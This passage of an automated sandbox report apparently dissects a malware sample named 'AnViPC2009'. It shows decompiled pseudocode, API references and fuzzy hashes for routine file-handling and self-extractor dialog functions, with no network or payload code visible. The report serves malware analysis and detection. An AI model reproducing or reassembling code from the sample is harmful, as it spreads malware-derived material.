                                                                                                                                                  					_t12 = E00405BD2(__ecx, __edx, __eflags, 0xffffffff, _a4, _a8, _t19);
                                                                                                                                                  					__eflags = _t12 - 0xffffffff;
                                                                                                                                                  					if(_t12 == 0xffffffff) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					FindClose(_t12); // executed
                                                                                                                                                  					_t8 = _t19 + 0x1098;
                                                                                                                                                  					 *_t8 =  *(_t19 + 0x1098) & 0x00000000;
                                                                                                                                                  					__eflags =  *_t8;
                                                                                                                                                  					 *((char*)(_t19 + 0xc10)) = E00405765( *((intOrPtr*)(_t19 + 0xc08)));
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				L1:
                                                                                                                                                  				return 0;
                                                                                                                                                  			}





                                                                                                                                                  0x0040600e
                                                                                                                                                  0x00406014
                                                                                                                                                  0x00406022
                                                                                                                                                  0x00406031
                                                                                                                                                  0x00406036
                                                                                                                                                  0x00406039
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040603c
                                                                                                                                                  0x00406048
                                                                                                                                                  0x00406048
                                                                                                                                                  0x00406048
                                                                                                                                                  0x00406054
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040605a
                                                                                                                                                  0x00406024
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,00404975,?,?,?,00000000,?,?), ref: 0040603C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                  • Opcode ID: ddd72c859a0e64e8ff79b562a707807e81bd6453bcb8e51290d5a757c6beaf7e
                                                                                                                                                  • Instruction ID: 3d7f3c3b9012688b66e0888be7438f14f03820285a0a93a3b7a5c38079f3b1d6
                                                                                                                                                  • Opcode Fuzzy Hash: ddd72c859a0e64e8ff79b562a707807e81bd6453bcb8e51290d5a757c6beaf7e
                                                                                                                                                  • Instruction Fuzzy Hash: 4EF05935000344FACF106FB08800AD73F54DF02330F14861AF9BD121D2C67660A4EB65
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405018(void* __ecx) {
                                                                                                                                                  				void* _t2;
                                                                                                                                                  				long _t3;
                                                                                                                                                  
                                                                                                                                                  				_t2 =  *(__ecx + 4);
                                                                                                                                                  				if(_t2 != 0xffffffff) {
                                                                                                                                                  					_t3 = GetFileType(_t2); // executed
                                                                                                                                                  					if(_t3 == 2 || _t3 == 3) {
                                                                                                                                                  						return 1;
                                                                                                                                                  					} else {
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  			}





                                                                                                                                                  0x00405018
                                                                                                                                                  0x0040501e
                                                                                                                                                  0x00405024
                                                                                                                                                  0x0040502d
                                                                                                                                                  0x0040503a
                                                                                                                                                  0x00405034
                                                                                                                                                  0x00405036
                                                                                                                                                  0x00405036
                                                                                                                                                  0x00405020
                                                                                                                                                  0x00405022
                                                                                                                                                  0x00405022

                                                                                                                                                  APIs
                                                                                                                                                  • GetFileType.KERNELBASE(?,004052DF,?,00405686,000000FF,?,00000000,?,00000000), ref: 00405024
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileType
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3081899298-0
                                                                                                                                                  • Opcode ID: b17af4d0c18cba9cbd1ce60f8f5e9395084e91915f2735113c94354b1645f1d0
                                                                                                                                                  • Instruction ID: dcf42afe2ef8df3973c4714377f73d6bbc07ffef476629597061786d6b19530e
                                                                                                                                                  • Opcode Fuzzy Hash: b17af4d0c18cba9cbd1ce60f8f5e9395084e91915f2735113c94354b1645f1d0
                                                                                                                                                  • Instruction Fuzzy Hash: 7CC080F051184011CF2045385D480AF234AD7433E67684EB1F021D11D0CB3CCD41FD84
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BB02(CHAR* _a8, char _a12) {
                                                                                                                                                  				char _v1028;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  
                                                                                                                                                  				wvsprintfA( &_v1028, _a8,  &_a12);
                                                                                                                                                  				_t9 = E0040AD1F(0,  &_v1028); // executed
                                                                                                                                                  				return _t9;
                                                                                                                                                  			}





                                                                                                                                                  0x0040bb19
                                                                                                                                                  0x0040bb28
                                                                                                                                                  0x0040bb2e

                                                                                                                                                  APIs
                                                                                                                                                  • wvsprintfA.USER32 ref: 0040BB19
                                                                                                                                                    • Part of subcall function 0040AD1F: GetDlgItem.USER32 ref: 0040AD30
                                                                                                                                                    • Part of subcall function 0040AD1F: ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE68), ref: 0040AD5D
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040AD69
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(00000000,000000C2,00000000,004125AA), ref: 0040AD78
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040AD8C
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,0000043A,00000000,?), ref: 0040ADA3
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040ADDE
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,000000C2,00000000,0040AE68), ref: 0040ADED
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040ADF5
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE19
                                                                                                                                                    • Part of subcall function 0040AD1F: SendMessageA.USER32(?,000000C2,00000000,004125E0), ref: 0040AE2A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$ItemShowWindowwvsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3976247692-0
                                                                                                                                                  • Opcode ID: ac89b50ad9207998d755dd402bc8c71fbaceed47d53291932db5a15f621a6e2d
                                                                                                                                                  • Instruction ID: c2ee3160304b1538c28e521a8f14a5b695c401521c27dd2f9f5ee73c9ce627b5
                                                                                                                                                  • Opcode Fuzzy Hash: ac89b50ad9207998d755dd402bc8c71fbaceed47d53291932db5a15f621a6e2d
                                                                                                                                                  • Instruction Fuzzy Hash: 99D09EB540420D6BDF10EBA0DC45FE9776CBB0430DF0440A5BB14E2080E674D61A8B69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B25C(intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                  				long _t4;
                                                                                                                                                  
                                                                                                                                                  				_t4 = SendDlgItemMessageA( *0x419f80, 0x68, 0x402, E0040A8CA(_a4, _a12), 0); // executed
                                                                                                                                                  				return _t4;
                                                                                                                                                  			}




                                                                                                                                                  0x0040b279
                                                                                                                                                  0x0040b27f

                                                                                                                                                  APIs
                                                                                                                                                  • SendDlgItemMessageA.USER32(00000068,00000402,00000000,?,?), ref: 0040B279
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3015471070-0
                                                                                                                                                  • Opcode ID: 71e6d2e7532dd6190ca1bcb92f75971a0448e3bc7bd69867ee858639e09b572b
                                                                                                                                                  • Instruction ID: 23437daa5becad03fdd72996915a65651d8e0de7de601c66f6da30ca0f09f4fe
                                                                                                                                                  • Opcode Fuzzy Hash: 71e6d2e7532dd6190ca1bcb92f75971a0448e3bc7bd69867ee858639e09b572b
                                                                                                                                                  • Instruction Fuzzy Hash: ECC01231280304BBEA01AB009D0AF5ABB22BB90702F00C828B741A40F1C7B20836EA09
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 28%
                                                                                                                                                  			_entry_(void* __eflags) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  
                                                                                                                                                  				E0040A699(_t3);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0); // executed
                                                                                                                                                  				E0040D37F(); // executed
                                                                                                                                                  				return 0;
                                                                                                                                                  			}




                                                                                                                                                  0x0040a7b1
                                                                                                                                                  0x0040a7b8
                                                                                                                                                  0x0040a7b9
                                                                                                                                                  0x0040a7ba
                                                                                                                                                  0x0040a7bb
                                                                                                                                                  0x0040a7bc
                                                                                                                                                  0x0040a7c1

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Module$EnvironmentHandleLoadNameVariableView$BitmapCloseCommandDialogIconInitializeLineMappingOpenParamUnmap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 50757371-0
                                                                                                                                                  • Opcode ID: ab70362c569cd47ca980f0429b2f695143b59ef30ce34a761a5feb4a0673a6dc
                                                                                                                                                  • Instruction ID: c6b8ce9343e560ac230c7b2287f334c9087cd8b9d03c2577f34d11881706e910
                                                                                                                                                  • Opcode Fuzzy Hash: ab70362c569cd47ca980f0429b2f695143b59ef30ce34a761a5feb4a0673a6dc
                                                                                                                                                  • Instruction Fuzzy Hash: 70A002C59206003CFA55B1F21C06D3F025CEA503083C44C7E3C40E2092E87D8C24007A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E00405005(void* __ecx) {
                                                                                                                                                  				int _t2;
                                                                                                                                                  
                                                                                                                                                  				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				return  ~(_t2 - 1) + 1;
                                                                                                                                                  			}




                                                                                                                                                  0x00405008
                                                                                                                                                  0x00405011
                                                                                                                                                  0x00405014

                                                                                                                                                  APIs
                                                                                                                                                  • SetEndOfFile.KERNELBASE(?,00404673,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00405008
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 749574446-0
                                                                                                                                                  • Opcode ID: 35695a334c179d3fdb105df6b28fef7f8c654bfb2a09aee6fb026c81aca8a2b6
                                                                                                                                                  • Instruction ID: 9905a9e3862bacf609bba6f04cb261d5c2e3eccfd351d4ba6fba37e6883ed9d5
                                                                                                                                                  • Opcode Fuzzy Hash: 35695a334c179d3fdb105df6b28fef7f8c654bfb2a09aee6fb026c81aca8a2b6
                                                                                                                                                  • Instruction Fuzzy Hash: 86B01130AA000AAA8E002B30CE088283A20EA2230A300C2B0A002C80A0CBA2C822AB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406EB8(signed char _a4, char _a8) {
                                                                                                                                                  				CHAR* _t3;
                                                                                                                                                  				CHAR* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t3 = _a4 & 0x000000ff;
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					_t4 = CharUpperA(_t3); // executed
                                                                                                                                                  					return _t4;
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}





                                                                                                                                                  0x00406ebd
                                                                                                                                                  0x00406ec2
                                                                                                                                                  0x00406ec5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406ec5
                                                                                                                                                  0x00406ecb

                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperA.USER32(?,00406F27,00000000,?,00000000,00000000,00000000,?,004070EE,00000000,00000000,00000000,__rar_,00000000,00000006,?), ref: 00406EC5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharUpper
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 9403516-0
                                                                                                                                                  • Opcode ID: d83d66618008fe431018aceaab787c407ffc4b323d5e4df0f26faf67823b0682
                                                                                                                                                  • Instruction ID: ba9d90cde8a007340699385a0d8a16809da81f70cdc10cdb9d28539cfc716c97
                                                                                                                                                  • Opcode Fuzzy Hash: d83d66618008fe431018aceaab787c407ffc4b323d5e4df0f26faf67823b0682
                                                                                                                                                  • Instruction Fuzzy Hash: 0BB092A080839129DB12A360C628B2BBE942BA1312F16CC9AF0D5A1091C27C8528D769
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E0040AE70(void* __ecx, void* __edx) {
                                                                                                                                                  				void* _t67;
                                                                                                                                                  				void* _t80;
                                                                                                                                                  				int _t82;
                                                                                                                                                  				signed int _t124;
                                                                                                                                                  				void* _t142;
                                                                                                                                                  				struct HICON__* _t143;
                                                                                                                                                  				void* _t146;
                                                                                                                                                  				void* _t147;
                                                                                                                                                  				void* _t148;
                                                                                                                                                  				void* _t149;
                                                                                                                                                  				void* _t150;
                                                                                                                                                  				void* _t156;
                                                                                                                                                  				signed int _t157;
                                                                                                                                                  				struct HWND__* _t163;
                                                                                                                                                  				void* _t171;
                                                                                                                                                  				void* _t173;
                                                                                                                                                  				void* _t174;
                                                                                                                                                  				void* _t176;
                                                                                                                                                  
                                                                                                                                                  				_t158 = __edx;
                                                                                                                                                  				_t156 = __ecx;
                                                                                                                                                  				_t171 = _t173 - 0x68;
                                                                                                                                                  				_t174 = _t173 - 0x95c;
                                                                                                                                                  				_t163 =  *(_t171 + 0x70);
                                                                                                                                                  				E00403059(__edx, _t163,  *(_t171 + 0x74),  *(_t171 + 0x78),  *((intOrPtr*)(_t171 + 0x7c)), "REPLACEFILEDLG", 0, 0);
                                                                                                                                                  				_t67 =  *(_t171 + 0x74) - 0x110;
                                                                                                                                                  				if(_t67 == 0) {
                                                                                                                                                  					E0040A484(_t171 - 0x8f4,  *((intOrPtr*)(_t171 + 0x7c)), 0x3ff);
                                                                                                                                                  					_push(0x400);
                                                                                                                                                  					 *((char*)(_t171 - 0x4f5)) = 0;
                                                                                                                                                  					E004079EF(_t156, _t171 - 0x8f4, 0);
                                                                                                                                                  					SetDlgItemTextA(_t163, 0x65, _t171 - 0x8f4);
                                                                                                                                                  					SHGetFileInfoA(_t171 - 0x8f4, 0, _t171 - 0x4f4, 0x160, 0x100);
                                                                                                                                                  					SendDlgItemMessageA( *(_t171 + 0x70), 0x66, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                  					_t80 = FindFirstFileA(_t171 - 0x8f4, _t171 - 0x194);
                                                                                                                                                  					 *(_t171 + 0x74) = _t80;
                                                                                                                                                  					if(_t80 != 0xffffffff) {
                                                                                                                                                  						FileTimeToLocalFileTime(_t171 - 0x180, _t171 + 0x48);
                                                                                                                                                  						FileTimeToSystemTime(_t171 + 0x48, _t171 + 0x58);
                                                                                                                                                  						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                  						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                  						wsprintfA(_t171 - 0x394, "%s %s %s", E004098D0(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                  						_t176 = _t174 + 0x14;
                                                                                                                                                  						SetDlgItemTextA( *(_t171 + 0x70), 0x6a, _t171 - 0x394);
                                                                                                                                                  						FindClose( *(_t171 + 0x74));
                                                                                                                                                  						if(( *(_t171 - 0x194) & 0x00000010) == 0) {
                                                                                                                                                  							E0040A864(_t156, _t158,  *((intOrPtr*)(_t171 - 0x174)), 0, _t171 - 0x54, 0x32);
                                                                                                                                                  							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098D0(0x80));
                                                                                                                                                  							_t176 = _t176 + 0x10;
                                                                                                                                                  							SetDlgItemTextA( *(_t171 + 0x70), 0x68, _t171 - 0x394);
                                                                                                                                                  						}
                                                                                                                                                  						SendDlgItemMessageA( *(_t171 + 0x70), 0x67, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                  						DosDateTimeToFileTime( *0x419eda & 0x0000ffff,  *0x419ed8 & 0x0000ffff, _t171 + 0x50);
                                                                                                                                                  						FileTimeToSystemTime(_t171 + 0x50, _t171 + 0x58);
                                                                                                                                                  						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                  						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                  						wsprintfA(_t171 - 0x394, "%s %s %s", E004098D0(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                  						SetDlgItemTextA( *(_t171 + 0x70), 0x6b, _t171 - 0x394);
                                                                                                                                                  						_t124 =  *0x419ee4; // 0x0
                                                                                                                                                  						_t157 =  *0x419ee0; // 0x0
                                                                                                                                                  						if(( *(_t171 - 0x194) & 0x00000010) == 0 || (_t157 | _t124) != 0) {
                                                                                                                                                  							E0040A864(_t157, _t171 - 0x54, _t157, _t124, _t171 - 0x54, 0x32);
                                                                                                                                                  							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098D0(0x80));
                                                                                                                                                  							SetDlgItemTextA( *(_t171 + 0x70), 0x69, _t171 - 0x394);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L25:
                                                                                                                                                  					_t82 = 1;
                                                                                                                                                  					L26:
                                                                                                                                                  					return _t82;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t67 != 1) {
                                                                                                                                                  					L9:
                                                                                                                                                  					_t82 = 0;
                                                                                                                                                  					goto L26;
                                                                                                                                                  				}
                                                                                                                                                  				_push(2);
                                                                                                                                                  				_pop(1);
                                                                                                                                                  				_t142 = ( *(_t171 + 0x78) & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t142 == 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					_push(5);
                                                                                                                                                  					L15:
                                                                                                                                                  					_pop(1);
                                                                                                                                                  					L16:
                                                                                                                                                  					_t143 = SendDlgItemMessageA(_t163, 0x66, 0x171, 0, 0);
                                                                                                                                                  					if(_t143 != 0) {
                                                                                                                                                  						DestroyIcon(_t143);
                                                                                                                                                  					}
                                                                                                                                                  					EndDialog(_t163, 1);
                                                                                                                                                  					goto L25;
                                                                                                                                                  				}
                                                                                                                                                  				_t146 = _t142 - 0x6a;
                                                                                                                                                  				if(_t146 == 0) {
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				_t147 = _t146 - 1;
                                                                                                                                                  				if(_t147 == 0) {
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				_t148 = _t147 - 1;
                                                                                                                                                  				if(_t148 == 0) {
                                                                                                                                                  					_push(4);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				_t149 = _t148 - 1;
                                                                                                                                                  				if(_t149 == 0) {
                                                                                                                                                  					_push(3);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				_t150 = _t149 - 1;
                                                                                                                                                  				if(_t150 == 0) {
                                                                                                                                                  					_push(6);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t150 == 1) {
                                                                                                                                                  					goto L14;
                                                                                                                                                  				}
                                                                                                                                                  				goto L9;
                                                                                                                                                  			}





















                                                                                                                                                  0x0040ae70
                                                                                                                                                  0x0040ae70
                                                                                                                                                  0x0040ae71
                                                                                                                                                  0x0040ae75
                                                                                                                                                  0x0040ae7e
                                                                                                                                                  0x0040ae94
                                                                                                                                                  0x0040ae9c
                                                                                                                                                  0x0040aea1
                                                                                                                                                  0x0040af17
                                                                                                                                                  0x0040af21
                                                                                                                                                  0x0040af2a
                                                                                                                                                  0x0040af30
                                                                                                                                                  0x0040af45
                                                                                                                                                  0x0040af60
                                                                                                                                                  0x0040af77
                                                                                                                                                  0x0040af8b
                                                                                                                                                  0x0040af91
                                                                                                                                                  0x0040af97
                                                                                                                                                  0x0040afa8
                                                                                                                                                  0x0040afb6
                                                                                                                                                  0x0040afca
                                                                                                                                                  0x0040afdd
                                                                                                                                                  0x0040b008
                                                                                                                                                  0x0040b00a
                                                                                                                                                  0x0040b019
                                                                                                                                                  0x0040b01e
                                                                                                                                                  0x0040b02b
                                                                                                                                                  0x0040b03b
                                                                                                                                                  0x0040b05b
                                                                                                                                                  0x0040b05d
                                                                                                                                                  0x0040b06c
                                                                                                                                                  0x0040b06c
                                                                                                                                                  0x0040b080
                                                                                                                                                  0x0040b09a
                                                                                                                                                  0x0040b0a8
                                                                                                                                                  0x0040b0bd
                                                                                                                                                  0x0040b0d2
                                                                                                                                                  0x0040b0f7
                                                                                                                                                  0x0040b108
                                                                                                                                                  0x0040b111
                                                                                                                                                  0x0040b116
                                                                                                                                                  0x0040b11c
                                                                                                                                                  0x0040b12c
                                                                                                                                                  0x0040b14c
                                                                                                                                                  0x0040b15d
                                                                                                                                                  0x0040b15d
                                                                                                                                                  0x0040b11c
                                                                                                                                                  0x0040b15f
                                                                                                                                                  0x0040b161
                                                                                                                                                  0x0040b162
                                                                                                                                                  0x0040b169
                                                                                                                                                  0x0040b169
                                                                                                                                                  0x0040aea4
                                                                                                                                                  0x0040aec5
                                                                                                                                                  0x0040aec5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aec5
                                                                                                                                                  0x0040aeaa
                                                                                                                                                  0x0040aeac
                                                                                                                                                  0x0040aead
                                                                                                                                                  0x0040aeaf
                                                                                                                                                  0x0040aedd
                                                                                                                                                  0x0040aedd
                                                                                                                                                  0x0040aedf
                                                                                                                                                  0x0040aedf
                                                                                                                                                  0x0040aee0
                                                                                                                                                  0x0040aeea
                                                                                                                                                  0x0040aef2
                                                                                                                                                  0x0040aef5
                                                                                                                                                  0x0040aef5
                                                                                                                                                  0x0040aefd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aefd
                                                                                                                                                  0x0040aeb1
                                                                                                                                                  0x0040aeb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aeda
                                                                                                                                                  0x0040aeb6
                                                                                                                                                  0x0040aeb7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aeb9
                                                                                                                                                  0x0040aeba
                                                                                                                                                  0x0040aed4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aed4
                                                                                                                                                  0x0040aebc
                                                                                                                                                  0x0040aebd
                                                                                                                                                  0x0040aed0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aed0
                                                                                                                                                  0x0040aebf
                                                                                                                                                  0x0040aec0
